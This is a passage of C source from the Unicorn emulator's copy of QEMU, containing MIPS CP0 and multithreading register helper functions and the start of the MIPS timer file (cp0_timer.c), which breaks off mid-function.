CP0MVPCo_VPC)) { mask |= (1 << CP0TCBd_CurVPE); } if (other_tc == other->current_tc) { newval = (other->active_tc.CP0_TCBind & ~mask) | (arg1 & mask); other->active_tc.CP0_TCBind = newval; } else { newval = (other->tcs[other_tc].CP0_TCBind & ~mask) | (arg1 & mask); other->tcs[other_tc].CP0_TCBind = newval; } } void helper_mtc0_tcrestart(CPUMIPSState *env, target_ulong arg1) { env->active_tc.PC = arg1; env->active_tc.CP0_TCStatus &= ~(1 << CP0TCSt_TDS); env->CP0_LLAddr = 0; env->lladdr = 0; /* MIPS16 not implemented. */ } void helper_mttc0_tcrestart(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.PC = arg1; other->active_tc.CP0_TCStatus &= ~(1 << CP0TCSt_TDS); other->CP0_LLAddr = 0; other->lladdr = 0; /* MIPS16 not implemented. */ } else { other->tcs[other_tc].PC = arg1; other->tcs[other_tc].CP0_TCStatus &= ~(1 << CP0TCSt_TDS); other->CP0_LLAddr = 0; other->lladdr = 0; /* MIPS16 not implemented. */ } } void helper_mtc0_tchalt(CPUMIPSState *env, target_ulong arg1) { MIPSCPU *cpu = env_archcpu(env); env->active_tc.CP0_TCHalt = arg1 & 0x1; /* TODO: Halt TC / Restart (if allocated+active) TC. */ if (env->active_tc.CP0_TCHalt & 1) { mips_tc_sleep(cpu, env->current_tc); } else { mips_tc_wake(cpu, env->current_tc); } } void helper_mttc0_tchalt(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); MIPSCPU *other_cpu = env_archcpu(other); /* TODO: Halt TC / Restart (if allocated+active) TC. */ if (other_tc == other->current_tc) { other->active_tc.CP0_TCHalt = arg1; } else { other->tcs[other_tc].CP0_TCHalt = arg1; } if (arg1 & 1) { mips_tc_sleep(other_cpu, other_tc); } else { mips_tc_wake(other_cpu, other_tc); } } void helper_mtc0_tccontext(CPUMIPSState *env, target_ulong arg1) { env->active_tc.CP0_TCContext = arg1; } void helper_mttc0_tccontext(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.CP0_TCContext = arg1; } else { other->tcs[other_tc].CP0_TCContext = arg1; } } void helper_mtc0_tcschedule(CPUMIPSState *env, target_ulong arg1) { env->active_tc.CP0_TCSchedule = arg1; } void helper_mttc0_tcschedule(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.CP0_TCSchedule = arg1; } else { other->tcs[other_tc].CP0_TCSchedule = arg1; } } void helper_mtc0_tcschefback(CPUMIPSState *env, target_ulong arg1) { env->active_tc.CP0_TCScheFBack = arg1; } void helper_mttc0_tcschefback(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.CP0_TCScheFBack = arg1; } else { other->tcs[other_tc].CP0_TCScheFBack = arg1; } } void helper_mtc0_entrylo1(CPUMIPSState *env, target_ulong arg1) { /* 1k pages not implemented */ target_ulong rxi = arg1 & (env->CP0_PageGrain & (3u << CP0PG_XIE)); env->CP0_EntryLo1 = (arg1 & MTC0_ENTRYLO_MASK(env)) | (rxi << (CP0EnLo_XI - 30)); } #if defined(TARGET_MIPS64) void helper_dmtc0_entrylo1(CPUMIPSState *env, uint64_t arg1) { uint64_t rxi = arg1 & 
((env->CP0_PageGrain & (3ull << CP0PG_XIE)) << 32); env->CP0_EntryLo1 = (arg1 & DMTC0_ENTRYLO_MASK(env)) | rxi; } #endif void helper_mtc0_context(CPUMIPSState *env, target_ulong arg1) { env->CP0_Context = (env->CP0_Context & 0x007FFFFF) | (arg1 & ~0x007FFFFF); } void helper_mtc0_memorymapid(CPUMIPSState *env, target_ulong arg1) { int32_t old; old = env->CP0_MemoryMapID; env->CP0_MemoryMapID = (int32_t) arg1; /* If the MemoryMapID changes, flush qemu's TLB. */ if (old != env->CP0_MemoryMapID) { cpu_mips_tlb_flush(env); } } void update_pagemask(CPUMIPSState *env, target_ulong arg1, int32_t *pagemask) { uint64_t mask = arg1 >> (TARGET_PAGE_BITS + 1); if (!(env->insn_flags & ISA_MIPS32R6) || (arg1 == ~0) || (mask == 0x0000 || mask == 0x0003 || mask == 0x000F || mask == 0x003F || mask == 0x00FF || mask == 0x03FF || mask == 0x0FFF || mask == 0x3FFF || mask == 0xFFFF)) { env->CP0_PageMask = arg1 & (0x1FFFFFFF & (TARGET_PAGE_MASK << 1)); } } void helper_mtc0_pagemask(CPUMIPSState *env, target_ulong arg1) { update_pagemask(env, arg1, &env->CP0_PageMask); } void helper_mtc0_pagegrain(CPUMIPSState *env, target_ulong arg1) { /* SmartMIPS not implemented */ /* 1k pages not implemented */ env->CP0_PageGrain = (arg1 & env->CP0_PageGrain_rw_bitmask) | (env->CP0_PageGrain & ~env->CP0_PageGrain_rw_bitmask); compute_hflags(env); restore_pamask(env); } void helper_mtc0_segctl0(CPUMIPSState *env, target_ulong arg1) { CPUState *cs = env_cpu(env); env->CP0_SegCtl0 = arg1 & CP0SC0_MASK; tlb_flush(cs); } void helper_mtc0_segctl1(CPUMIPSState *env, target_ulong arg1) { CPUState *cs = env_cpu(env); env->CP0_SegCtl1 = arg1 & CP0SC1_MASK; tlb_flush(cs); } void helper_mtc0_segctl2(CPUMIPSState *env, target_ulong arg1) { CPUState *cs = env_cpu(env); env->CP0_SegCtl2 = arg1 & CP0SC2_MASK; tlb_flush(cs); } void helper_mtc0_pwfield(CPUMIPSState *env, target_ulong arg1) { #if defined(TARGET_MIPS64) uint64_t mask = 0x3F3FFFFFFFULL; uint32_t old_ptei = (env->CP0_PWField >> CP0PF_PTEI) & 0x3FULL; uint32_t new_ptei = (arg1 >> CP0PF_PTEI) & 0x3FULL; if ((env->insn_flags & ISA_MIPS32R6)) { if (((arg1 >> CP0PF_BDI) & 0x3FULL) < 12) { mask &= ~(0x3FULL << CP0PF_BDI); } if (((arg1 >> CP0PF_GDI) & 0x3FULL) < 12) { mask &= ~(0x3FULL << CP0PF_GDI); } if (((arg1 >> CP0PF_UDI) & 0x3FULL) < 12) { mask &= ~(0x3FULL << CP0PF_UDI); } if (((arg1 >> CP0PF_MDI) & 0x3FULL) < 12) { mask &= ~(0x3FULL << CP0PF_MDI); } if (((arg1 >> CP0PF_PTI) & 0x3FULL) < 12) { mask &= ~(0x3FULL << CP0PF_PTI); } } env->CP0_PWField = arg1 & mask; if ((new_ptei >= 32) || ((env->insn_flags & ISA_MIPS32R6) && (new_ptei == 0 || new_ptei == 1))) { env->CP0_PWField = (env->CP0_PWField & ~0x3FULL) | (old_ptei << CP0PF_PTEI); } #else uint32_t mask = 0x3FFFFFFF; uint32_t old_ptew = (env->CP0_PWField >> CP0PF_PTEW) & 0x3F; uint32_t new_ptew = (arg1 >> CP0PF_PTEW) & 0x3F; if ((env->insn_flags & ISA_MIPS32R6)) { if (((arg1 >> CP0PF_GDW) & 0x3F) < 12) { mask &= ~(0x3F << CP0PF_GDW); } if (((arg1 >> CP0PF_UDW) & 0x3F) < 12) { mask &= ~(0x3F << CP0PF_UDW); } if (((arg1 >> CP0PF_MDW) & 0x3F) < 12) { mask &= ~(0x3F << CP0PF_MDW); } if (((arg1 >> CP0PF_PTW) & 0x3F) < 12) { mask &= ~(0x3F << CP0PF_PTW); } } env->CP0_PWField = arg1 & mask; if ((new_ptew >= 32) || ((env->insn_flags & ISA_MIPS32R6) && (new_ptew == 0 || new_ptew == 1))) { env->CP0_PWField = (env->CP0_PWField & ~0x3F) | (old_ptew << CP0PF_PTEW); } #endif } void helper_mtc0_pwsize(CPUMIPSState *env, target_ulong arg1) { #if defined(TARGET_MIPS64) env->CP0_PWSize = arg1 & 0x3F7FFFFFFFULL; #else env->CP0_PWSize = arg1 & 
0x3FFFFFFF; #endif } void helper_mtc0_wired(CPUMIPSState *env, target_ulong arg1) { if (env->insn_flags & ISA_MIPS32R6) { if (arg1 < env->tlb->nb_tlb) { env->CP0_Wired = arg1; } } else { env->CP0_Wired = arg1 % env->tlb->nb_tlb; } } void helper_mtc0_pwctl(CPUMIPSState *env, target_ulong arg1) { #if defined(TARGET_MIPS64) /* PWEn = 0. Hardware page table walking is not implemented. */ env->CP0_PWCtl = (env->CP0_PWCtl & 0x000000C0) | (arg1 & 0x5C00003F); #else env->CP0_PWCtl = (arg1 & 0x800000FF); #endif } void helper_mtc0_srsconf0(CPUMIPSState *env, target_ulong arg1) { env->CP0_SRSConf0 |= arg1 & env->CP0_SRSConf0_rw_bitmask; } void helper_mtc0_srsconf1(CPUMIPSState *env, target_ulong arg1) { env->CP0_SRSConf1 |= arg1 & env->CP0_SRSConf1_rw_bitmask; } void helper_mtc0_srsconf2(CPUMIPSState *env, target_ulong arg1) { env->CP0_SRSConf2 |= arg1 & env->CP0_SRSConf2_rw_bitmask; } void helper_mtc0_srsconf3(CPUMIPSState *env, target_ulong arg1) { env->CP0_SRSConf3 |= arg1 & env->CP0_SRSConf3_rw_bitmask; } void helper_mtc0_srsconf4(CPUMIPSState *env, target_ulong arg1) { env->CP0_SRSConf4 |= arg1 & env->CP0_SRSConf4_rw_bitmask; } void helper_mtc0_hwrena(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = 0x0000000F; if ((env->CP0_Config1 & (1 << CP0C1_PC)) && (env->insn_flags & ISA_MIPS32R6)) { mask |= (1 << 4); } if (env->insn_flags & ISA_MIPS32R6) { mask |= (1 << 5); } if (env->CP0_Config3 & (1 << CP0C3_ULRI)) { mask |= (1 << 29); if (arg1 & (1 << 29)) { env->hflags |= MIPS_HFLAG_HWRENA_ULR; } else { env->hflags &= ~MIPS_HFLAG_HWRENA_ULR; } } env->CP0_HWREna = arg1 & mask; } void helper_mtc0_count(CPUMIPSState *env, target_ulong arg1) { //cpu_mips_store_count(env, arg1); } void helper_mtc0_saari(CPUMIPSState *env, target_ulong arg1) { uint32_t target = arg1 & 0x3f; if (target <= 1) { env->CP0_SAARI = target; } } void helper_mtc0_saar(CPUMIPSState *env, target_ulong arg1) { uint32_t target = env->CP0_SAARI & 0x3f; if (target < 2) { env->CP0_SAAR[target] = arg1 & 0x00000ffffffff03fULL; switch (target) { case 0: if (env->itu) { // itc_reconfigure(env->itu); } break; } } } void helper_mthc0_saar(CPUMIPSState *env, target_ulong arg1) { uint32_t target = env->CP0_SAARI & 0x3f; if (target < 2) { env->CP0_SAAR[target] = (((uint64_t) arg1 << 32) & 0x00000fff00000000ULL) | (env->CP0_SAAR[target] & 0x00000000ffffffffULL); switch (target) { case 0: if (env->itu) { // itc_reconfigure(env->itu); } break; } } } void helper_mtc0_entryhi(CPUMIPSState *env, target_ulong arg1) { target_ulong old, val, mask; mask = (TARGET_PAGE_MASK << 1) | env->CP0_EntryHi_ASID_mask; if (((env->CP0_Config4 >> CP0C4_IE) & 0x3) >= 2) { mask |= 1 << CP0EnHi_EHINV; } /* 1k pages not implemented */ #if defined(TARGET_MIPS64) if (env->insn_flags & ISA_MIPS32R6) { int entryhi_r = extract64(arg1, 62, 2); int config0_at = extract32(env->CP0_Config0, 13, 2); bool no_supervisor = (env->CP0_Status_rw_bitmask & 0x8) == 0; if ((entryhi_r == 2) || (entryhi_r == 1 && (no_supervisor || config0_at == 1))) { /* skip EntryHi.R field if new value is reserved */ mask &= ~(0x3ull << 62); } } mask &= env->SEGMask; #endif old = env->CP0_EntryHi; val = (arg1 & mask) | (old & ~mask); env->CP0_EntryHi = val; if (env->CP0_Config3 & (1 << CP0C3_MT)) { sync_c0_entryhi(env, env->current_tc); } /* If the ASID changes, flush qemu's TLB. 
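* (QEMU's software TLB is tagged only by MMU index and virtual address, not by
* ASID, so entries cached for the old ASID have to be dropped wholesale.)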
*/ if ((old & env->CP0_EntryHi_ASID_mask) != (val & env->CP0_EntryHi_ASID_mask)) { tlb_flush(env_cpu(env)); } } void helper_mttc0_entryhi(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); other->CP0_EntryHi = arg1; sync_c0_entryhi(other, other_tc); } void helper_mtc0_compare(CPUMIPSState *env, target_ulong arg1) { // cpu_mips_store_compare(env, arg1); } void helper_mtc0_status(CPUMIPSState *env, target_ulong arg1) { cpu_mips_store_status(env, arg1); #if 0 uint32_t val, old; val = env->CP0_Status; old = env->CP0_Status; if (qemu_loglevel_mask(CPU_LOG_EXEC)) { qemu_log("Status %08x (%08x) => %08x (%08x) Cause %08x", old, old & env->CP0_Cause & CP0Ca_IP_mask, val, val & env->CP0_Cause & CP0Ca_IP_mask, env->CP0_Cause); switch (cpu_mmu_index(env, false)) { case 3: qemu_log(", ERL\n"); break; case MIPS_HFLAG_UM: qemu_log(", UM\n"); break; case MIPS_HFLAG_SM: qemu_log(", SM\n"); break; case MIPS_HFLAG_KM: qemu_log("\n"); break; default: cpu_abort(env_cpu(env), "Invalid MMU mode!\n"); break; } } #endif } void helper_mttc0_status(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); uint32_t mask = env->CP0_Status_rw_bitmask & ~0xf1000018; CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); other->CP0_Status = (other->CP0_Status & ~mask) | (arg1 & mask); sync_c0_status(env, other, other_tc); } void helper_mtc0_intctl(CPUMIPSState *env, target_ulong arg1) { env->CP0_IntCtl = (env->CP0_IntCtl & ~0x000003e0) | (arg1 & 0x000003e0); } void helper_mtc0_srsctl(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = (0xf << CP0SRSCtl_ESS) | (0xf << CP0SRSCtl_PSS); env->CP0_SRSCtl = (env->CP0_SRSCtl & ~mask) | (arg1 & mask); } void helper_mtc0_cause(CPUMIPSState *env, target_ulong arg1) { cpu_mips_store_cause(env, arg1); } void helper_mttc0_cause(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); cpu_mips_store_cause(other, arg1); } target_ulong helper_mftc0_epc(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); return other->CP0_EPC; } target_ulong helper_mftc0_ebase(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); return other->CP0_EBase; } void helper_mtc0_ebase(CPUMIPSState *env, target_ulong arg1) { target_ulong mask = 0x3FFFF000 | env->CP0_EBaseWG_rw_bitmask; if (arg1 & env->CP0_EBaseWG_rw_bitmask) { mask |= ~0x3FFFFFFF; } env->CP0_EBase = (env->CP0_EBase & ~mask) | (arg1 & mask); } void helper_mttc0_ebase(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); target_ulong mask = 0x3FFFF000 | env->CP0_EBaseWG_rw_bitmask; if (arg1 & env->CP0_EBaseWG_rw_bitmask) { mask |= ~0x3FFFFFFF; } other->CP0_EBase = (other->CP0_EBase & ~mask) | (arg1 & mask); } target_ulong helper_mftc0_configx(CPUMIPSState *env, target_ulong idx) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); switch (idx) { case 0: return other->CP0_Config0; case 1: return other->CP0_Config1; case 2: return other->CP0_Config2; case 3: return other->CP0_Config3; /* 4 and 5 are reserved. 
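* They fall through to the default case below and read as zero.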
*/ case 6: return other->CP0_Config6; case 7: return other->CP0_Config7; default: break; } return 0; } void helper_mtc0_config0(CPUMIPSState *env, target_ulong arg1) { env->CP0_Config0 = (env->CP0_Config0 & 0x81FFFFF8) | (arg1 & 0x00000007); } void helper_mtc0_config2(CPUMIPSState *env, target_ulong arg1) { /* tertiary/secondary caches not implemented */ env->CP0_Config2 = (env->CP0_Config2 & 0x8FFF0FFF); } void helper_mtc0_config3(CPUMIPSState *env, target_ulong arg1) { if (env->insn_flags & ASE_MICROMIPS) { env->CP0_Config3 = (env->CP0_Config3 & ~(1 << CP0C3_ISA_ON_EXC)) | (arg1 & (1 << CP0C3_ISA_ON_EXC)); } } void helper_mtc0_config4(CPUMIPSState *env, target_ulong arg1) { env->CP0_Config4 = (env->CP0_Config4 & (~env->CP0_Config4_rw_bitmask)) | (arg1 & env->CP0_Config4_rw_bitmask); } void helper_mtc0_config5(CPUMIPSState *env, target_ulong arg1) { env->CP0_Config5 = (env->CP0_Config5 & (~env->CP0_Config5_rw_bitmask)) | (arg1 & env->CP0_Config5_rw_bitmask); env->CP0_EntryHi_ASID_mask = (env->CP0_Config5 & (1 << CP0C5_MI)) ? 0x0 : (env->CP0_Config4 & (1 << CP0C4_AE)) ? 0x3ff : 0xff; compute_hflags(env); } void helper_mtc0_lladdr(CPUMIPSState *env, target_ulong arg1) { target_long mask = env->CP0_LLAddr_rw_bitmask; arg1 = arg1 << env->CP0_LLAddr_shift; env->CP0_LLAddr = (env->CP0_LLAddr & ~mask) | (arg1 & mask); } #define MTC0_MAAR_MASK(env) \ ((0x1ULL << 63) | ((env->PAMask >> 4) & ~0xFFFull) | 0x3) void helper_mtc0_maar(CPUMIPSState *env, target_ulong arg1) { env->CP0_MAAR[env->CP0_MAARI] = arg1 & MTC0_MAAR_MASK(env); } void helper_mthc0_maar(CPUMIPSState *env, target_ulong arg1) { env->CP0_MAAR[env->CP0_MAARI] = (((uint64_t) arg1 << 32) & MTC0_MAAR_MASK(env)) | (env->CP0_MAAR[env->CP0_MAARI] & 0x00000000ffffffffULL); } void helper_mtc0_maari(CPUMIPSState *env, target_ulong arg1) { int index = arg1 & 0x3f; if (index == 0x3f) { /* * Software may write all ones to INDEX to determine the * maximum value supported. */ env->CP0_MAARI = MIPS_MAAR_MAX - 1; } else if (index < MIPS_MAAR_MAX) { env->CP0_MAARI = index; } /* * Other than the all ones, if the value written is not supported, * then INDEX is unchanged from its previous value. */ } void helper_mtc0_watchlo(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { /* * Watch exceptions for instructions, data loads, data stores * not implemented. 
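* The ~0x7 mask below keeps the W/R/I enable bits clear, so no
* watchpoint can actually fire.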
*/ env->CP0_WatchLo[sel] = (arg1 & ~0x7); } void helper_mtc0_watchhi(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { uint64_t mask = 0x40000FF8 | (env->CP0_EntryHi_ASID_mask << CP0WH_ASID); if ((env->CP0_Config5 >> CP0C5_MI) & 1) { mask |= 0xFFFFFFFF00000000ULL; /* MMID */ } env->CP0_WatchHi[sel] = arg1 & mask; env->CP0_WatchHi[sel] &= ~(env->CP0_WatchHi[sel] & arg1 & 0x7); } void helper_mthc0_watchhi(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { env->CP0_WatchHi[sel] = ((uint64_t) (arg1) << 32) | (env->CP0_WatchHi[sel] & 0x00000000ffffffffULL); } void helper_mtc0_xcontext(CPUMIPSState *env, target_ulong arg1) { target_ulong mask = (1ULL << (env->SEGBITS - 7)) - 1; env->CP0_XContext = (env->CP0_XContext & mask) | (arg1 & ~mask); } void helper_mtc0_framemask(CPUMIPSState *env, target_ulong arg1) { env->CP0_Framemask = arg1; /* XXX */ } void helper_mtc0_debug(CPUMIPSState *env, target_ulong arg1) { env->CP0_Debug = (env->CP0_Debug & 0x8C03FC1F) | (arg1 & 0x13300120); if (arg1 & (1 << CP0DB_DM)) { env->hflags |= MIPS_HFLAG_DM; } else { env->hflags &= ~MIPS_HFLAG_DM; } } void helper_mttc0_debug(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); uint32_t val = arg1 & ((1 << CP0DB_SSt) | (1 << CP0DB_Halt)); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); /* XXX: Might be wrong, check with EJTAG spec. */ if (other_tc == other->current_tc) { other->active_tc.CP0_Debug_tcstatus = val; } else { other->tcs[other_tc].CP0_Debug_tcstatus = val; } other->CP0_Debug = (other->CP0_Debug & ((1 << CP0DB_SSt) | (1 << CP0DB_Halt))) | (arg1 & ~((1 << CP0DB_SSt) | (1 << CP0DB_Halt))); } void helper_mtc0_performance0(CPUMIPSState *env, target_ulong arg1) { env->CP0_Performance0 = arg1 & 0x000007ff; } void helper_mtc0_errctl(CPUMIPSState *env, target_ulong arg1) { int32_t wst = arg1 & (1 << CP0EC_WST); int32_t spr = arg1 & (1 << CP0EC_SPR); int32_t itc = env->itc_tag ? (arg1 & (1 << CP0EC_ITC)) : 0; env->CP0_ErrCtl = wst | spr | itc; if (itc && !wst && !spr) { env->hflags |= MIPS_HFLAG_ITC_CACHE; } else { env->hflags &= ~MIPS_HFLAG_ITC_CACHE; } } void helper_mtc0_taglo(CPUMIPSState *env, target_ulong arg1) { if (env->hflags & MIPS_HFLAG_ITC_CACHE) { /* * If CACHE instruction is configured for ITC tags then make all * CP0.TagLo bits writable. The actual write to ITC Configuration * Tag will take care of the read-only bits. 
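* In the ordinary (non-ITC) case the read-only bits are simply
* masked off below instead.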
*/ env->CP0_TagLo = arg1; } else { env->CP0_TagLo = arg1 & 0xFFFFFCF6; } } void helper_mtc0_datalo(CPUMIPSState *env, target_ulong arg1) { env->CP0_DataLo = arg1; /* XXX */ } void helper_mtc0_taghi(CPUMIPSState *env, target_ulong arg1) { env->CP0_TagHi = arg1; /* XXX */ } void helper_mtc0_datahi(CPUMIPSState *env, target_ulong arg1) { env->CP0_DataHi = arg1; /* XXX */ } /* MIPS MT functions */ target_ulong helper_mftgpr(CPUMIPSState *env, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.gpr[sel]; } else { return other->tcs[other_tc].gpr[sel]; } } target_ulong helper_mftlo(CPUMIPSState *env, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.LO[sel]; } else { return other->tcs[other_tc].LO[sel]; } } target_ulong helper_mfthi(CPUMIPSState *env, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.HI[sel]; } else { return other->tcs[other_tc].HI[sel]; } } target_ulong helper_mftacx(CPUMIPSState *env, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.ACX[sel]; } else { return other->tcs[other_tc].ACX[sel]; } } target_ulong helper_mftdsp(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.DSPControl; } else { return other->tcs[other_tc].DSPControl; } } void helper_mttgpr(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.gpr[sel] = arg1; } else { other->tcs[other_tc].gpr[sel] = arg1; } } void helper_mttlo(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.LO[sel] = arg1; } else { other->tcs[other_tc].LO[sel] = arg1; } } void helper_mtthi(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.HI[sel] = arg1; } else { other->tcs[other_tc].HI[sel] = arg1; } } void helper_mttacx(CPUMIPSState *env, target_ulong arg1, uint32_t sel) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.ACX[sel] = arg1; } else { other->tcs[other_tc].ACX[sel] = arg1; } } void helper_mttdsp(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.DSPControl = arg1; } else { other->tcs[other_tc].DSPControl = arg1; } } /* MIPS MT functions */ target_ulong helper_dmt(void) { /* TODO */ return 0; } target_ulong 
helper_emt(void) { /* TODO */ return 0; } target_ulong helper_dvpe(CPUMIPSState *env) { #if 0 // FIXME CPUState *other_cs = first_cpu; target_ulong prev = env->mvp->CP0_MVPControl; CPU_FOREACH(other_cs) { MIPSCPU *other_cpu = MIPS_CPU(other_cs); /* Turn off all VPEs except the one executing the dvpe. */ if (&other_cpu->env != env) { other_cpu->env.mvp->CP0_MVPControl &= ~(1 << CP0MVPCo_EVP); mips_vpe_sleep(other_cpu); } } return prev; #endif return 0; } target_ulong helper_evpe(CPUMIPSState *env) { #if 0 CPUState *other_cs = first_cpu; target_ulong prev = env->mvp->CP0_MVPControl; CPU_FOREACH(other_cs) { MIPSCPU *other_cpu = MIPS_CPU(other_cs); if (&other_cpu->env != env /* If the VPE is WFI, don't disturb its sleep. */ && !mips_vpe_is_wfi(other_cpu)) { /* Enable the VPE. */ other_cpu->env.mvp->CP0_MVPControl |= (1 << CP0MVPCo_EVP); mips_vpe_wake(other_cpu); /* And wake it up. */ } } return prev; #endif return 0; } /* R6 Multi-threading */ target_ulong helper_dvp(CPUMIPSState *env) { #if 0 CPUState *other_cs = first_cpu; target_ulong prev = env->CP0_VPControl; if (!((env->CP0_VPControl >> CP0VPCtl_DIS) & 1)) { CPU_FOREACH(other_cs) { MIPSCPU *other_cpu = MIPS_CPU(other_cs); /* Turn off all VPs except the one executing the dvp. */ if (&other_cpu->env != env) { mips_vpe_sleep(other_cpu); } } env->CP0_VPControl |= (1 << CP0VPCtl_DIS); } return prev; #endif return 0; } target_ulong helper_evp(CPUMIPSState *env) { #if 0 CPUState *other_cs = first_cpu; target_ulong prev = env->CP0_VPControl; if ((env->CP0_VPControl >> CP0VPCtl_DIS) & 1) { CPU_FOREACH(other_cs) { MIPSCPU *other_cpu = MIPS_CPU(other_cs); if ((&other_cpu->env != env) && !mips_vp_is_wfi(other_cpu)) { /* * If the VP is WFI, don't disturb its sleep. * Otherwise, wake it up. */ mips_vpe_wake(other_cpu); } } env->CP0_VPControl &= ~(1 << CP0VPCtl_DIS); } return prev; #endif return 0; }

unicorn-2.1.1/qemu/target/mips/cp0_timer.c

/* * QEMU MIPS timer support * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE.
*/ #include "qemu/osdep.h" //#include "hw/irq.h" //#include "hw/mips/cpudevs.h" #include "qemu/timer.h" //#include "sysemu/kvm.h" #include "internal.h" #define TIMER_PERIOD 10 /* 10 ns period for 100 Mhz frequency */ /* XXX: do not use a global */ uint32_t cpu_mips_get_random(CPUMIPSState *env) { static uint32_t seed = 1; static uint32_t prev_idx = 0; uint32_t idx; uint32_t nb_rand_tlb = env->tlb->nb_tlb - env->CP0_Wired; if (nb_rand_tlb == 1) { return env->tlb->nb_tlb - 1; } /* Don't return same value twice, so get another value */ do { /* * Use a simple algorithm of Linear Congruential Generator * from ISO/IEC 9899 standard. */ seed = 1103515245 * seed + 12345; idx = (seed >> 16) % nb_rand_tlb + env->CP0_Wired; } while (idx == prev_idx); prev_idx = idx; return idx; } #if 0 /* MIPS R4K timer */ static void cpu_mips_timer_update(CPUMIPSState *env) { uint64_t now, next; uint32_t wait; now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); wait = env->CP0_Compare - env->CP0_Count - (uint32_t)(now / TIMER_PERIOD); next = now + (uint64_t)wait * TIMER_PERIOD; timer_mod(env->timer, 